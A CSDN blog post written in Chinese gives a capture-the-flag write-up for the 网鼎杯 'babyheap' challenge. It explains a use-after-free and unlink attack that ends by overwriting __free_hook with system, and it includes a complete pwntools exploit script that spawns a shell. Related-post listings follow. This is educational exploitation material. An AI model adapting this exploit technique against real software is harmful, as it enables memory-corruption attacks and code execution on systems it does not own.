网鼎杯 babyheap

最新推荐文章于 2024-07-27 13:59:36 发布
最新推荐文章于 2024-07-27 13:59:36 发布
阅读量895 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MozhuCY/article/details/82799410
版权

网鼎杯第一场

  • 程序功能:新建,编辑,打印,free
  • free处没有置空指针,导致可以uaf
  • malloc每次都是0x20的fastbin,编辑功能可以使用3次
  • 自写了readn函数,没有溢出点
  • edit可以修改free后堆块的bk,fd
1
2
3
4
5

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
  • Full RELRO导致got表不可写,所以只能劫持malloc_hook或者free_hook_来劫持程序的流程
  • 现在面临两个问题,一个是泄露程序基址,一个是控制指针
  • 关于泄露程序基址的问题,我们可以采用先劫持指针再leak的方法,比如指向got表的一部分,然后打印它的值
  • 这里我采用unlink的方法来劫持指针,首先通过fastbin的性质,并且和存在的UAF泄露堆基址,然后利用一次edit来实现fastbin堆块的分配
  • 这里我们可以用错位生成的fastbin的数据段进行修改出一个fake chunk,并且通过unlink劫持一根指指针
  • 我劫持的是chunklist[9],因为这样我相当于同时控制了3根指针
  • 拿到指针的控制权后,首先修改edit次数,因为count在全局变量里是int型,所以我将其修改成了0xfffffff0,也就是一个负数,这样我就可以无限次数的edit
  • 随后打印got表内容,算出偏移,再次edit指针,将其指向__free_hook_,并且覆写其为system函数,free之前写好的包含”/bin/sh\x00”的堆块

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71

from pwn import *

r = process("./babyheap")
ptr = 0x602060
sys_libc = 0x45390
atoi_libc = 0x36E80

def add(index,content):
    r.sendlineafter("Choice:","1")
    r.sendlineafter("Index:",str(index))
    if len(content) == 32:
        r.sendafter("Content:",content)
    else:
        r.sendlineafter("Content:",content)

def edit(index,content):
    r.sendlineafter("Choice:","2")
    r.sendlineafter("Index:",str(index))
    if len(content) == 32:
        r.sendafter("Content:",content)
    else:
        r.sendlineafter("Content:",content)

def show(index):
    r.sendlineafter("Choice:","3")
    r.sendlineafter("Index:",str(index))

def free(index):
    r.sendlineafter("Choice:","4")
    r.sendlineafter("Index:",str(index))

def exp():
    add(9,p64(0x31)*4)
    add(0,p64(0x31)*4)
    add(1,p64(0x31)*4)
    add(2,p64(0x31)*4)

    free(1)
    free(0)
    free(9)
    show(9)
    heapbase = u64(r.recv(4) + '\x00'*4) -0x30 #heapbase
    print "%x"%heapbase
    payload = "a"*8 + p64(0x80) + p64(ptr + 8 * 9 - 0x18) + p64(ptr + 8 * 9 - 0x10)
    add(3,payload)
    edit(0,p64(heapbase + 0x80))       #fastbin
    add(4,"/bin/sh\x00")
    add(5,p64(0x80)+p64(0x90)+"flag")
    add(6,"flag")
    add(7,"flag"*8)
    add(8,"flag"*8)
    free(2) #unlink
    
    payload = p64(0x6020B0) + p64(0x601FE8)
    edit(9,payload)
    edit(6,p64(4294967286)) #count edit

    show(7)
    atoi = u64(r.recv(6) + '\x00\x00')
    hook = atoi - atoi_libc + 3958696
    sys = atoi - atoi_libc + sys_libc
    print "hook %x"%hook
    print "sys %x"%sys
    payload = p64(hook)
    edit(9,payload)
    edit(6,p64(sys))
    free(4)
    r.interactive()

if __name__=="__main__":
    exp()
MozhuCY
关注
2022网鼎杯初赛朱雀组赛题
10-18
2022网鼎杯初赛朱雀组赛题
CTF-网鼎杯往届题目
qq_37410729的博客
07-24 1789
网鼎杯题目
wdb_2018_1st_babyheap
z1r0的博客
03-24 538
wdb_2018_1st_babyheap 查看保护 一个uaf漏洞这个程序内申请的堆块大小是固定的0x20。edit有限制 攻击思路:这里有两种攻击方法,一种是unlink,因为pie没开。还有一种是FSOP。 这里笔者unlink打不通,然后就采取了FSOP 首先肯定是泄露libc。因为FSOP需要_IO_list_all这个地方。 泄露libc一般是unstortedbin来泄露,所以这里想办法给出一个0x90以上的堆块 因为有uaf,再加上2.23下的libc.so,所以可以先泄露出heap_a
[网鼎杯 2020 朱雀组]Nmap(详细解读版)
最新发布
weixin_73399382的博客
07-27 1008
这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里两种解题方法:第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入webshell-oN 标准保存-oX XML保存-oG保存-oA 保存到所有格式。
0ctfbabyheap2017WP——堆溢出fastbin attack初探
GeekCmore的博客
02-18 547
从栈溢出进入堆溢出,漏洞利用的复杂度上了一个大台阶,主要是因为 ptmalloc 内存管理器对于堆管理设计了复杂的数据结构和算法,要想进入堆溢出的学习,就必须厘清它们之间的关系。本文将从一个经典的例子——0ctfbabyheap2017 来介绍一个初级的 fastbin attack 以初探堆溢出攻击。
攻防世界PWNBabyheap(null off by one)题解
seaaseesa的博客
11-20 2158
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
网络攻防-
远行的博客
07-27 188
文章目录网络攻防参考文章 网络攻防 参考文章 网络攻击分类
2020网鼎杯.zip
07-20
网鼎杯】是一项旨在提升网络安全能力的比赛,它涵盖了多种网络安全技术,如逆向工程(Reverse Engineering)、pwn(破解)以及密码学等。 【逆向工程】是一种技术,它涉及分析软件或硬件的功能,以了解其工作原理...
2022网鼎杯初赛玄武组赛题
10-18
2022网鼎杯初赛玄武组赛题
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目网鼎杯2022,白虎组,ctf
网鼎杯青龙组18道.rar
06-11
【标题】"网鼎杯青龙组18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙组的比赛题目网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙组,...
网鼎杯 白虎组.zip
05-15
2020第二届 网鼎杯网络安全大赛白虎组 线下赛 真题 pwn reserve web misc 按照“网鼎杯”大赛两一届的举办原则,第二届“网鼎杯”大赛5月开赛,6月19日至21日在广东省深圳市举办线下半决赛、总决赛和颁奖典礼。
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3965
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
babyheap_fastbin_attack
playmaker的博客
06-23 261
babyheap-堆溢出之fastbin_attack 首先检查程序保护 保护全开。是一个选单系统 分析程序 void new() { int index; // [rsp+0h] [rbp-10h] signed int size; // [rsp+4h] [rbp-Ch] void *ptr; // [rsp+8h] [rbp-8h] for ( index = 0; i...
actf_2019_babyheap题解析
qq_29317353的博客
06-18 289
再次创建一个0x10大小的堆块,会从fastbin里面拿出一个0x10大小的堆块就是index3会覆盖掉index0的地址根据malloc的分配机制,所以把函数的指针改为system把content的指针改成/bin/sh就完成了UAF漏洞利用的一个过程。struct chunk是0x10的堆结构体,content chunk是用来存放数据的。查看printf_out,发现利用点。思路创键3给堆块,大小相同,防止合并。由于是UAF漏洞先看,free。看看分配堆块的地方,看注释。mian函数分析,见注释。
0ctf2018-babyheap调试记录fastbin-attack,off-by-one
weixin_30596165的博客
11-03 112
查看文件格式以及保护开启情况。发现为64位程序,符号被剥离,动态链接程序且题目提供给了libc。保护全开,猜想可能是fast attack加上malloc_hook利用(毕竟去这题是这个利用,肯定先往这边想) 简单的运行程序,发现是常规的菜单类题目,功能有申请内存(alloc)、更新(update)、删除(delete)、查看(view)、退出。我们每个功能走...
fast_attack+unlink(wdb_2018_1st_babyheap)
csdn546229768的博客
03-01 316
题目:wdb_2018_1st_babyheap 保护 分析 alloc函数: free函数: edit函数: 这题我干掉了睡眠函数,idapython脚本如下: addres_start = 0x400CE3 addres_end = 0x400CED for i in range(addres_start,addres_end): ida_bytes.patch_byte(i,0x90) 这题的的漏洞还是挺多的uaf、off-by-null、double free但是off-by-nu
网络攻防之CTF篇
qq_42824259的博客
11-13 1244
XCTF之网鼎杯(双色块) 这是第一次写CSDN文章,平时主要是以学习别人的文章为主,作为一个编程和ctf的入门选手,水平肯定比较一般,写出来的目的就是加深自己的记忆,同时能够给别人提供一个不一样的思路吧(大佬除外)!废话不多说,现在开始。 给的图片是一个动态图片,咋一看,除了颜色变换外,看不出任何的思路,只有老规矩,notpad++打开,ctrl+f 搜索 ng,看到这个, 看到了熟悉的Png图片头,那直接放kali里面,用foremost -T分离出来, 分离的结果就是一张写着key的图,也不知道有什
babyheap(uaf ,绕过tcache doublefree检测)
m0_51251108的博客
09-18 1079
浙江省第五届大学生网络与信息安全竞赛预赛pwn
解密网鼎杯chaoyang.txt: 分数分解与筛法流程详解
网鼎杯密码题是一道涉及加密算法和解题逻辑的编程挑战,主要关注于解决一个特定的数学问题。根据提供的代码片段,我们可以分析出以下关键知识点: 1. **函数调用和操作**: - `LOAD_GLOBAL` 和 `LOAD_ATTR` 操作符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值